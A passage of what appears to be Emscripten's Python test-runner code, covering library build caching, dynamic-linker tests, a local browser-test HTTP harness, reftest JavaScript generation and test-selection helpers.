limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(building.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
# In the long run it would nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
self.fail('subprocess exited with non-zero return code(%d): `%s`' %
(e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
with open(filename, 'w') as f:
f.write(src)
self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
self._build_and_run(filename, open(expected_output_filename).read(), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = path_from_root(*path)
outfile = shared.unsuffixed(srcfile) + '.out'
expected = open(outfile).read()
self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
js_engines=None, post_build=None, libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
self.build(filename, libraries=libraries, includes=includes, post_build=post_build,
force_c=force_c)
js_file = shared.unsuffixed(os.path.basename(filename)) + '.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdenticalUrlEncoded(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
report_header = path_from_root('tests', 'report_result.h')
report_main = open(path_from_root('tests', 'report_result.cpp')).read()
return f'''
#define EMTEST_PORT_NUMBER {self.port}
#include "{report_header}"
{report_main}
{user_code}
'''
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
self.run_process([EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False, extra_tries=1):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args = args + ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
skipped = False
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
suite = getattr(m, suite_name, None)
if suite:
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
skipped = True
break
assert skipped, "Not able to skip test " + test
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
